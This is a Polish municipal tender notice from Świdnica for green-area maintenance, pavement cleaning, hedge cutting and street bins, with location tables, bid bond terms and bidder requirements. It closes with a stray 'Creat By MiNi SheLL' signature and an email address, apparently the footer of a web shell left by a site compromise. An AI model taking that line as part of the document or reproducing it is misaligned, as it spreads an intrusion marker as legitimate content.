L.p.	Lokalizacja	Powierzchnia
1)Bohaterów Getta - prawa strona od Pułaskiego	230 m2
2)Jagiellońska - zieleniec	20 m2
3)Krzywickiego - zieleniec	30 m2
4)Lompy- Zachodnia - skrzyżowanie	25 m2
5)Łukowa - gazony granitowe	20 m2
6)Pl. Wolności - gazon z ławką przed apteką Pod Bykami	2 m2
7)Plac Grunwaldzki -zieleniec	40 m2
8)Plac Wolności - wysepki-5szt.	657 m2
9)Pułaskiego 61-71 - tarasy	460 m2
10)Równa - wysepka przy jezdni vis a vis pływalni	34 m2
11)Równa -Westerplatte - skrzyżowanie - zieleniec z nasadzeniami przy przystanku MPK	15 m2
12)Saperów-Kościelna - zieleniec przy skrzyżowaniu	30 m2
13)Siostrzana - zieleńce z nasadzeniami krzewów	411 m2
14)Szpitalna-Pułaskiego 71- zieleniec przy schodach	15 m2
15)Śląska - nasadzenia od ul. Pionierów do ul. Sadowej	640 m2
16)Wodna - zieleńce przed Szkolą Podstawową Nr 6	173 m2
RAZEM 2 802 m2

 3.Wykaz chodników i placów do oczyszczania w ramach ryczałtu letniego
L.p.	Lokalizacja	Powierzchnia
1)Głowackiego - chodnik wzdłuż działki nr 354-25	50 m2
2)Hetmańska - od Parkowej do Kosynierów - chodnik	271 m2
3)Kazimierza Wielkiego - chodniki	2474 m2
4)Kliczkowska - parking	4847 m2 
5)Kopernika - od Kliczkowskiej do rzeki - chodniki po obu stronach drogi	715 m2
6)Kosynierów - od Hetmańskiej do Pileckiego - chodniki po obu stronach drogi	1031 m2
7)Miłego Dnia - ścieżka rowerowa	930 m2
8)Miłego Dnia - chodnik  po stronie Szkoły Hotelarskiej i działki nr 203	458 m2
9)Pobożnego - chodnik w pobliżu garaży	150 m2 
10)Stęczyńskiego - chodnik wzdłuż cmentarza żydowskiego	374 m2
11)Stęczyńskiego - chodniki od cmentarza do Łukasińskiego	2189 m2
12)Śląska - nowo-wybudowane chodniki	2197 m2
13)Webera -chodnik od Zamenhofa do schodów w kierunku Słobódzkiego	278 m2
14)Westerplatte - chodnik przy parkingu Galerii Świdnickiej	1031 m2
15)Westerplatte - parking przy Galerii Świdnickiej	1097 m2 
16)Wodna - chodnik od Mieszka do Wrocławskiej - lewa strona drogi	660 m2
17)Wyszyńskiego - parking	828 m2 
18)Zamenhofa - chodnik na działce 35/1 w pobliżu Riedla	66 m2 
RAZEM 19 646 m2
4. Wykaz żywopłotów do cięcia (formowanie kształtu)
Drogi gminne

L.p.	Lokalizacja	Powierzchnia
1)Długa 72 - żywopłot - przed Urzędem Miar	123 m2 
2)Kopernika - od mostu na Wodnej do Kliczkowskiej	314 m2
3)Kopernika-Kilińskiego - skrzyżowanie	82 m2
4)Ks. Agnieszki 2 - żywopłot naprzeciwko ZSE	122 m2 
5)Okulickiego 14 - żywopłot	45 m2
6)Parkowa 8 - wysepka	110 m2
7)Plac Kombatantów - żywopłot z berberysu	20 m2
8)Słowackiego - żywopłot z ligustru	15 m2
9)Wesoła - żywopłot przy skarpie Łukasińskiego	103 m2
10)Wodna -  żywopłot koło mostu na zieleńcach	554 m2
11)Wodna - od Mieszka do Wrocławskiej	70 m2
RAZEM 1 558 m2
5. Wykaz zieleńców z nasadzeniami roślin do plewienia
L.p.	Lokalizacja	Powierzchnia
1)Bohaterów Getta - zieleńce	230 m2
2)Lompy-Zachodnia - skrzyżowanie -  zieleniec	25 m2
3)Łukowa - gazony granitowe	20 m2
4)Plac Wolności - gazon z ławką przed apteką Pod Bykami	2 m2
5)Plac Wolności - wysepki - 9 szt.   	953 m2
6)Pobożnego-Stęczyńskiego - rondo	393 m2
7)Pułaskiego 61-71 - tarasy	460 m2
8)Równa - wysepka przy jezdni vis a vis  pływalni	34 m2
9)Równa -Westerplatte - skrzyżowanie - zieleniec z nasadzeniami przy przystanku MPK	15 m2
10)Siostrzana - zieleńce z nasadzeniami krzewów	411 m2
11)Szpitalna-Pułaskiego 71- zieleniec przy schodach	15 m2
12)Śląska -Pionierów - rondo	380 m2
13)Westerplatte - rondo Orląt Lwowskich	380 m2
14)Wodna - zieleńce przed Szkolą Podstawową Nr 6	173 m2	
RAZEM 3 491 m2
6. Wykaz miejsc ustawienia koszy ulicznych
L.p.	Lokalizacja	Ilość
1)Kazimierza Wielkiego - lewa strona od ronda do Długosza	4 szt.
2)Marcinkowskiego - od pawilonów handlowych do ul. E. Plater	3 szt. 
3)Marcinkowskiego - parking	1 szt.
4)Miłego Dnia - na wysokości firmy Forpol	1 szt.
5)Miłego Dnia - przy moście	1 szt.
6)Miłego Dnia - w pobliżu Zespołu Szkół Hotelarskich		1 szt.
7)Paderewskiego - parking	1 szt.
8)Polna Droga - alejka między zalewem Witoszówką, a ul. Słowiańską	4 szt.
9)Równa - zieleniec vis a vis targowiska	1 szt.
10)Sikorskiego - przejście dla pieszych między ul. Sikorskiego, a ul. Strzegomską	1 szt.
11)Śląska - od Westerplatte do Pionierów - prawa strona	5 szt. 
12)Waryńskiego - w pobliżu pawilonów handlowych	4 szt.
13)Wodna - po stronie rzeki vis a vis posesji Wodna 34	1 szt.
14)Wróblewskiego - prawa strona od Riedla do E. Plater	4 szt.
RAZEM 32 szt..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w oparciu o art. 67 ust. 1 pkt. 6  ustawy Pzp przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż  5 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości :  12 000 zł ( słownie: dwanaście tysięcy złotych ) 

11.2 Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 
07.08.2014 r. przed godz. 09.00

11.3 Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Pzp z tym, że:

a ) złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO. 
S.A  I Oddział w Świdnicy  96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.   
b) złożone w gwarancjach ( bankowych, ubezpieczeniowych ):
z treści gwarancji winno wynikać bezwarunkowo ( na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą ) zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Pzp tj. w przypadku gdy Wykonawca:                                             
- odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,                                              
- w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
c) złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony  za potwierdzeniem,  przed upływem terminu składania ofert.
d/ w przypadku złożenia wadium w formie innej niż pieniądz, dokument gwarancji/poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art.23 ustawy Pzp. 

11.4. Dowód przelewu lub potwierdzenie depozytu ( oryginał ) należy  załączyć do oferty. 

11.5. Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.

11.6. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy , którego oferta została wybrana  jako najkorzystniejsza.

11.7  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. 

11.8  Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11.9  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
 c) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunków w wyżej wymienionym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykaże się wykonaniem lub wykonywaniem usług polegających na utrzymaniu terenów zielonych o wartości łącznej nie mniejszej niż 1 500 000 zł brutto,  w tym jedno zadanie na kwotę minimum 500 000 zł brutto. W przypadku wykonywania usług stawiany warunek musi być spełniony na dzień składania ofert.
Opis dla potwierdzenia tego warunku powinien być zawarty  w załączniku nr 2 do oferty Wykonawcy ( wzór załącznik C do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujący warunek:

6.1.3.1 posiadać lub dysponować  bazą sprzętowo- warsztatową zlokalizowaną na terenie Miasta Świdnica lub Gminy Świdnica.

6.1.3.2 dysponować potencjałem technicznym do wykonania zamówienia 
W tym zakresie zamawiający wymaga aby Wykonawca dysponował n/w sprzętem:

- ciągnik z przyczepą lub samochód samowyładowczy do 5 t - 1 szt.
- kosiarka samojezdna z możliwością zbierania pokosu
o minimalnej szerokości koszenia 100 cm - 2 szt.
- kosiarka spalinowa                                   - 10 szt.
- rębak spalinowy                                       - 1 szt.
- frez spalinowy                                          - 1 szt.
- beczka asenizacyjna( beczkowóz)
o pojemności minimum 1000 l                   - 1 szt.

- nożyce spalinowe			         - 3 szt.
- podnośnik koszowy                                  - 1 szt.
- 32 sztuki jednolitych, estetycznych koszy ulicznych o pojemności minimum 60 l, pomalowanych na kolor zielony, model należy uzgodnić z Zamawiającym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować osobami zdolnymi do wykonania zamówienia
- dysponować kierownikiem robót, który posiada minimum średnie wykształcenie ogrodnicze
- dysponować dwoma pilarzami, którzy posiadają uprawnienia operatorów pił mechanicznych
do ścinki drzew,
- dysponować ogrodnikiem, który posiada minimum średnie wykształcenie ogrodnicze oraz
ukończył kurs w zakresie leczenia i pielęgnacji drzew ozdobnych,
- posiadać średnie roczne zatrudnienie w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy to za ten okres nie niższe niż 20 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości min. 200 000 zł ( dwieście tysięcy złotych ) oraz, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 300 000 zł ( trzysta tysięcy złotych ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykaz  wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  usług  w okresie ostatnich 3 lat  przed upływem terminu składania ofert a jeżeli
okres prowadzenia działalności jest krótszy - w tym okresie polegających na utrzymaniu terenów zielonych o wartości łącznej nie mniejszej niż  1 500 000 zł brutto,  w tym jedno zadanie na kwotę minimum 500 000 zł brutto z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie.
W przypadku wykonywania usług stawiany warunek musi być spełniony na dzień składania ofert.
Wzór wykazu wykonanych prac stanowi załącznik C do SIWZ ( załącznik nr 2 do oferty Wykonawcy ).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli Wykonawca będzie polegał na zdolności ekonomiczno-finansowej podmiotów trzecich do oferty winien dołączyć oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów ( art. 369 k.c. ).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">dokument potwierdzający prawo posiadania lub dysponowania bazą sprzętowo - warsztatową ( umowa kupna, umowa użyczenia, umowa najmu itp. ) zlokalizowaną na terenie Miasta Świdnica lub Gminy Świdnica ( załącznik nr 8 do oferty Wykonawcy ).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dodatkowo Wykonawca winien do oferty dołączyć: 
- dowód wniesienia wadium ( załącznik nr 19 do oferty Wykonawcy ),
- pełnomocnictwo do podpisania oferty w przypadku , gdy ofertę podpisuje osoba ( osoby nie wskazane w dokumencie rejestrowym ) upoważniona do składania oświadczeń woli przez Wykonawcę  ( załącznik nr 20 do oferty Wykonawcy  ),
- pełnomocnictwo dla pełnomocnika składającego ofertę w ramach oferty wspólnej ( załącznik nr 21 do oferty  Wykonawcy ),
- informację o przynależności do grupy kapitałowej w przypadku gdy Wykonawca należy do grupy kapitałowej - załącznik J do SIWZ ( załącznik nr 22 do oferty Wykonawcy ),                                                                
- zaparafowany projekt umowy - załącznik K do SIWZ ( załącznik nr 23 do oferty Wykonawcy), 
-  kosztorys  - wzór kosztorys nakładczy - załącznik L do SIWZ ( załącznik nr 24 do oferty Wykonawcy ).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający wymaga od Wykonawcy aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach jak umowa, której projekt stanowi załącznik K do SIWZ .

19.2 Zamawiający przewiduje zmiany umowy wprowadzane aneksem zaakceptowanym przez obie strony w następujących przypadkach:
a)  jeżeli zmiana umowy jest korzystna dla Zamawiającego ( korzyść ekonomiczna, techniczna, eksploatacyjna),
b) jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które 
nastąpiły w czasie realizacji zamówienia,
c) z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego
bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach. 

19.3. Zamawiającemu przysługuje prawo do natychmiastowego odstąpienia 
od umowy w przypadku:
a) gdy zostanie ogłoszona upadłość lub rozwiązanie firmy Wykonawcy,
b) gdy zostanie wydany nakaz zajęcia majątku Wykonawcy,
c) jeżeli Wykonawca nie rozpoczął robót bez uzasadnionych przyczyn, nie kontynuuje ich mimo wezwania Zamawiającego złożonego na piśmie a przerwa w realizacji trwa dłużej niż 7 dni,
d) rażących zaniedbań w realizacji przedmiotu umowy. Przez rażące zaniedbanie należy rozumieć sytuację w której  wysokość kar umownych z tytułu o którym  mowa w  § 13 umowy ust. 1 pkt. b, c, d, e,  f,  g, h,  przekroczy 2 % wartości zamówienia podstawowego.
e) braku dokumentów o których mowa w § 16 umowy.
f) innych istotnych okoliczności, powodujących, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy.

19.4  Zamawiający w czasie sezonu zimowego w ramach realizowanej umowy zawiesi realizację zadań rozliczanych w formie ryczałtu zimowego w następujących  sytuacjach:
1) występowania ujemnych temperatur w ciągu całej doby przy dużej wilgotności powietrza, które powodują możliwość występowania obfitych opadów śniegu,
2) niekorzystnej długoterminowej prognozy pogody ( ujemne temperatury, opady śniegu) przy równoczesnym zaleganiu pokrywy śnieżnej.
W przypadku zawieszenia prac o których mowa w pkt. 1 i 2  przysługujące wynagrodzenie w formie ryczałtu zimowego zostanie obniżone proporcjonalnie do okresu zawieszenia prac.

19.5 Termin płatności: Zamawiający zobowiązuje się do uregulowania należności na rzecz Wykonawcy w terminie 30 dni od daty otrzymania faktury wraz z dokumentami o których mowa w § 4 ust. 3 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów pok. 124 I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.08.2014 godzina 09:00, miejsce: Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów pok. 124 I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com